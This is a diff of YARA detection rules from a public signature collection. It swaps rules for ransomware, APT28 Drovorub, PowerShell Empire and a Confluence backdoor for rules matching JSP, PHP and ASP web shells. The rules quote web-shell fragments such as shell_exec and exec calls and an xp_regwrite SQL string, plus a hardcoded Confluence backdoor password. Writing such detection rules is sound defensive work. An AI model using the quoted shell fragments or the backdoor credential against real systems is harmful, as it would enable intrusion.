+		$s9 = "sis = request.getInputStream();" fullword
 
 	condition:
-		filesize < 1KB and all of them
+		4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Mssqlpw_Scan : FILE
+rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1
 {
 	meta:
-		description = "Script from disclosed CN Honker Pentest Toolset - file mssqlpw scan.txt"
+		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7dc29d06-e1e7-527f-b9e5-d75f660fd73e"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_scripts.yar#L362-L377"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3059-L3079"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e49def9d72bfef09a639ef3f7329083a0b8b151c"
-		logic_hash = "eb3bd38ca317f0b10358581fc3dbb8ca81b991b9a4f4f2d256d81a31028411b9"
+		logic_hash = "795eb586310d87a3c6b53117bf2c8cbcfadcb177f5a5129c17fd21f0b64c385c"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
+		hash3 = "56c005690da2558690c4aa305a31ad37"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
 
 	strings:
-		$s0 = "response.Write(\"I Get it ! Password is <font color=red>\" & str & \"</font><BR>" ascii
-		$s1 = "response.Write \"Done!<br>Process \" & tTime & \" s\"" fullword ascii
+		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
+		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
+		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
 
 	condition:
-		filesize < 6KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Gen_Suspicious_Inpage_Dropper : FILE
+rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Jsp_Suiyue_Warn
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Florian Roth"
-		id = "9144711a-e6ee-5c97-a5f4-3f6df1d630dc"
-		date = "2019-07-03"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/Ahmedfshosha/status/1138138981521154049"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_suspicious_InPage_dropper.yar#L1-L23"
+		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3080-L3104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ab5d0bffa72b32f4c388f42a38a799c178fddf9f06b1262842e146c43448bd4"
-		score = 65
+		logic_hash = "5e0da29499d76539fb1f5cfbe0a00331eeb0bb8fa861f2e2d686130ee4939fac"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852"
-		hash2 = "1d1e7a6175e6c514aaeca8a43dabefa017ddc5b166ccb636789b6a767181a022"
-		hash3 = "bd293bdf3be0a44a92bdb21e5fa75c124ad1afed3c869697bf90c9732af0e994"
-		hash4 = "d8edf3e69f006f85b9ee4e23704cd5e95e895eb286f9b749021d090448493b6f"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
+		hash3 = "8979594423b68489024447474d113894"
+		hash4 = "ec482fc969d182e5440521c913bab9bd"
+		hash5 = "f98d2b33cd777e160d1489afed96de39"
+		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
+		hash7 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s1 = "InPage Arabic Document"
-		$c1 = {31 06 83 c6 04 e2 }
-		$c2 = {90 90 90 90 90 90 90 e8 fb }
+		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
+		$s2 = " KB </td>" fullword
+		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
+		$s4 = "<!-- <tr align=\"center\"> " fullword
 
 	condition:
-		filesize < 3MB and uint32be( 0 ) == 0xD0CF11E0 and $s1 and 1 of ( $c* )
+		all of them
 }
-rule SIGNATURE_BASE_Locky_Ransomware
+rule SIGNATURE_BASE_Webshell_Phpspy_2005_Full_Phpspy_2005_Lite_Phpspy_2006_PHPSPY
 {
 	meta:
-		description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
-		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
-		id = "ce61e01e-a9ce-54f4-bd2d-8acf1d5fbc30"
-		date = "2016-02-17"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/qScSrE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_locky.yar#L8-L21"
+		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3106-L3126"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
-		logic_hash = "c7584ea39c4aceedeb0ea2952be6ff212461674175855274f1783eef80ffba86"
-		score = 75
+		logic_hash = "fc47a50c5964574fb9b9caf3fb94041f028998577bf4ccf21884a41fa1876572"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
+		hash2 = "40a1f840111996ff7200d18968e42cfe"
+		hash3 = "0712e3dc262b4e1f98ed25760b206836"
 
 	strings:
-		$o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 }
-		$o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 }
+		$s4 = "http://www.4ngel.net" fullword
+		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
+		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
+		$s9 = "Codz by Angel" fullword
 
 	condition:
-		all of ( $o* )
+		2 of them
 }
-rule SIGNATURE_BASE_APT_APT28_Generic_Poco_Openssl
+rule SIGNATURE_BASE_Webshell_C99_Locus7S_C99_W4Cking_Xxx
 {
 	meta:
-		description = "Rule to detect statically linked POCO and OpenSSL libraries (COULD be Drovorub related and should be further investigated)"
-		author = "NSA / FBI"
-		id = "b6d2477b-c9a2-5858-87cf-aa006109bc8f"
-		date = "2020-08-13"
-		modified = "2023-12-05"
-		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28_drovorub.yar#L1-L21"
+		description = "Web Shell"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3127-L3156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b6a78c358b3aee6b172ec29e72ce810c6fbf332f180d5879f0889f47688225e1"
-		score = 50
+		logic_hash = "4afadac41e729f77711eb3ea3ee8f6e8ce61e19294e90db024e5334e214d9647"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
+		hash1 = "9c34adbc8fd8d908cbb341734830f971"
+		hash2 = "ef43fef943e9df90ddb6257950b3538f"
+		hash3 = "ae025c886fbe7f9ed159f49593674832"
+		hash4 = "911195a9b7c010f61b66439d9048f400"
+		hash5 = "697dae78c040150daff7db751fc0c03c"
+		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
+		hash12 = "41af6fd253648885c7ad2ed524e0692d"
+		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$mw1 = { 89 F1 48 89 FE 48 89 D7 48 F7 C6 FF FF FF FF 0F 84 6B 02 00 00 48 F7 C7
-                 FF FF FF FF 0F 84 5E 02 00 00 48 8D 2D }
-		$mw2 = { 41 54 49 89 D4 55 53 F6 47 19 04 48 8B 2E 75 08 31 DB F6 45 00 03 75 }
-		$mw3 = { 85C0BA15000000750989D05BC30F1F44 0000BE }
-		$mw4 = { 53 8A 47 08 3C 06 74 21 84 C0 74 1D 3C 07 74 20 B9 ?? ?? ?? ?? BA FD 03
-                 00 00 BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E8 06 3C 01 77 2B 48 8B 1F 48 8B 73
-                 10 48 89 DF E8 ?? ?? ?? ?? 48 8D 43 08 48 C7 43 10 00 00 00 00 48 C7 43 28 00 00 00 00 48
-                 89 43 18 48 89 43 20 5B C3 }
+		$s1 = "$res = @shell_exec($cfe);" fullword
+		$s8 = "$res = @ob_get_contents();" fullword
+		$s9 = "@exec($cfe,$res);" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_APT_APT28_Drovorub_Library_And_Unique_Strings : FILE
+rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Ma2_Download
 {
 	meta:
-		description = "Rule to detect Drovorub-server, Drovorub-agent, and Drovorub-client"
-		author = "NSA / FBI"
-		id = "8e010356-09c7-5897-9cbe-051cd0800502"
-		date = "2020-08-13"
-		modified = "2023-12-05"
-		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28_drovorub.yar#L23-L42"
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3157-L3178"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "adb0d4cb6d589213e6a125d3cc20fcea8164b697bdd24d897ce75e7c7f06120a"
-		score = 75
+		logic_hash = "3b8bb6ca2eb146f8c170d629612ba12d4663445d443b681f2859af25d50ab6fe"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
+		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s1 = "Poco" ascii wide
-		$s2 = "Json" ascii wide
-		$s3 = "OpenSSL" ascii wide
-		$a1 = "clientid" ascii wide
-		$a2 = "-----BEGIN" ascii wide
-		$a3 = "-----END" ascii wide
-		$a4 = "tunnel" ascii wide
+		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
+		$s2 = "private static String tempdir = \".\";" fullword
+		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
 
 	condition:
-		( filesize > 1MB and filesize < 10MB and ( uint32( 0 ) == 0x464c457f ) ) and ( #s1 > 20 and #s2 > 15 and #s3 > 15 and all of ( $a* ) )
+		2 of them
 }
-rule SIGNATURE_BASE_APT_APT28_Drovorub_Unique_Network_Comms_Strings
+rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010
 {
 	meta:
-		description = "Rule to detect Drovorub-server, Drovorub-agent, or Drovorub-client based"
-		author = "NSA / FBI"
-		id = "c6a930e8-c1c0-5d96-9051-7516df848b45"
-		date = "2020-08-13"
-		modified = "2023-12-05"
-		reference = "https://www.nsa.gov/news-features/press-room/Article/2311407/nsa-and-fbi-expose-russian-previously-undisclosed-malware-drovorub-in-cybersecu/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt28_drovorub.yar#L44-L72"
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3179-L3200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8c82766b76c36fe64c6aa99577e1997d7181dbd36a4c27329845ae8a413f5327"
-		score = 75
+		logic_hash = "dd01bb059d741fedaee17d46355c7cd8a845d714b20ae37db36424544b954d2f"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
 
 	strings:
-		$s_01 = "action" wide ascii
-		$s_02 = "auth.commit" wide ascii
-		$s_03 = "auth.hello" wide ascii
-		$s_04 = "auth.login" wide ascii
-		$s_05 = "auth.pending" wide ascii
-		$s_06 = "client_id" wide ascii
-		$s_07 = "client_login" wide ascii
-		$s_08 = "client_pass" wide ascii
-		$s_09 = "clientid" wide ascii
-		$s_10 = "clientkey_base64" wide ascii
-		$s_11 = "file_list_request" wide ascii
-		$s_12 = "module_list_request" wide ascii
-		$s_13 = "monitor" wide ascii
-		$s_14 = "net_list_request" wide ascii
-		$s_15 = "server finished" wide ascii
-		$s_16 = "serverid" wide ascii
-		$s_17 = "tunnel" wide ascii
+		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
+		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
+		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
+		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A1 : FILE
+rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Kartal_R57
 {
 	meta:
-		description = "Detects suspicious sample with PowerShell content "
+		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1699f153-f972-5e06-a94b-eb95af637e6b"
-		date = "2017-07-27"
-		modified = "2023-12-05"
-		reference = "PowerShell Empire Eval"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps_empire_eval.yar#L11-L25"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3201-L3219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e77ff4e216601c62a049569a6ea1aae13fc2612b480f4d7fad4e99dc72155da3"
-		score = 65
+		logic_hash = "fd849f76f8348ee57a9c96eed91c8cac416fdc45a08c93e93ebc952375de27a3"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4d10e80c7c80ef040efc680424a429558c7d76a965685bbc295908cb71137eba"
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
 
 	strings:
-		$s1 = "powershell" wide
-		$s2 = "pshcmd" fullword ascii
+		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
+		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
+		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		2 of them
 }
-rule SIGNATURE_BASE_Powershell_Emp_Eval_Jul17_A2 : FILE
+rule SIGNATURE_BASE_Webshell_Webshells_New_Con2
 {
 	meta:
-		description = "Detects suspicious sample with PowerShell content "
+		description = "Web shells - generated from file con2.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8f299fcd-156c-5ce1-8582-c2a4ff2c0cfc"
-		date = "2017-07-27"
-		modified = "2023-12-05"
-		reference = "PowerShell Empire Eval"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_ps_empire_eval.yar#L27-L41"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3221-L3235"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "28f320e721a61d7e2db39830652038eb4090429d73162888570a97b0bc1504d8"
-		score = 65
+		hash = "d3584159ab299d546bd77c9654932ae3"
+		logic_hash = "c681b04a1ee4d6af3275b6d772ef35f8bc888a5fcaf3b84f29f77c264e8ad9b9"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e14c139159c23fdc18969afe57ec062e4d3c28dd42a20bed8ddde37ab4351a51"
 
 	strings:
-		$x1 = "\\support\\Release\\ab.pdb" ascii
-		$s2 = "powershell.exe" ascii fullword
+		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
+		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		1 of them
 }
-rule SIGNATURE_BASE_VULN_Confluence_Questions_Plugin_CVE_2022_26138_Jul22_1 : CVE_2022_26138
+rule SIGNATURE_BASE_Webshell_Webshells_New_Make2
 {
 	meta:
-		description = "Detects properties file of Confluence Questions plugin with static user name and password (backdoor) CVE-2022-26138"
+		description = "Web shells - generated from file make2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1443c673-2a86-5431-876a-c8fccba52190"
-		date = "2022-07-21"
-		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/news/security/atlassian-fixes-critical-confluence-hardcoded-credentials-flaw/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/vul_confluence_questions_plugin_cve_2022_26138.yar#L2-L23"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3236-L3249"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c164bd3d9ed1e155d51112e14340b814f6ea782604540c84a6e9efb5c6041156"
+		hash = "9af195491101e0816a263c106e4c145e"
+		logic_hash = "7c94c925b5fd7fbc37428c21a9ea3c5a73f4fa0a20a1f5d03f0d5a990bd6f45a"
 		score = 50
 		quality = 85
-		tags = "CVE-2022-26138"
-
-	strings:
-		$x_plain_1 = "predefined.user.password=disabled1system1user6708"
-		$jar_marker = "/confluence/plugins/questions/"
-		$jar_size_1 = { 00 CC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-      /*    here starts default.properties v                          */
-                      ?? ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74 2E 70
-                      72 6F 70 65 72 74 69 65 73 50 4B }
-		$jar_size_2 = { 00 CC 00 ?? ?? ?? ?? ?? 00 64 65 66 61 75 6C 74
-                      2E 70 72 6F 70 65 72 74 69 65 73 }
-
-	condition:
-		1 of ( $x* ) or ( $jar_marker and 1 of ( $jar_size* ) )
-}
-rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core_PDF : FILE
-{
-	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
-		author = "Symantec Security Response"
-		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
-		date = "2015-01-22"
-		modified = "2023-12-05"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L3-L15"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a854926a4a98eb1d13a582b4ff4504b9740b8bbe7aa6b5192aeb4d2438a58926"
-		score = 75
-		quality = 35
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/
-		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
+		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"
 
 	condition:
-		uint32( 0 ) == 0x46445025 and #a > 150 and #b > 200
+		all of them
 }
-rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Dll
+rule SIGNATURE_BASE_Webshell_Webshells_New_Aaa
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
-		author = "Symantec Security Response"
-		id = "2aae09a3-6e59-5951-941e-c1f82aada979"
-		date = "2015-01-22"
-		modified = "2023-12-05"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L17-L32"
+		description = "Web shells - generated from file aaa.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3250-L3265"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f29ff81d62bd6bea776aeddc0725b034624f836c234441f63a8b697e959d3f8d"
-		score = 75
+		hash = "68483788ab171a155db5266310c852b2"
+		logic_hash = "3c5b9dd86dc790b03a8540b2fb3a717c5ad17d34f366a319faa127479387eed9"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$string1 = "/%s?rank=%s"
-		$string2 = "ModuleStart\x00ModuleStop\x00start"
-		$string3 = "1156fd22-3443-4344-c4ffff"
-		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
+		$s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\""
+		$s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL"
+		$s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Waterbug_Wipbot_2013_Core : FILE
+rule SIGNATURE_BASE_Webshell_Expdoor_Com_ASP
 {
 	meta:
-		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
-		author = "Symantec Security Response"
-		id = "2e8ccce9-d8ba-573d-b532-76d8e2ed5442"
-		date = "2015-01-22"
-		modified = "2023-01-27"
-		reference = "http://t.co/rF35OaAXrl"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_waterbug.yar#L34-L48"
+		description = "Web shells - generated from file Expdoor.com ASP.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-03-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L3266-L3283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59e1363225b1f7765e953e3d6803270b82f4268431d92ef00ed1010df0793e5f"
-		score = 75
+		hash = "caef01bb8906d909f24d1fa109ea18a7"
+		logic_hash = "838edb9d718b5e1a8be155c4569b4a291b37337e71b435c2b1cd6bcaa53c0dea"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
-		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
-		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04}
-		$code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
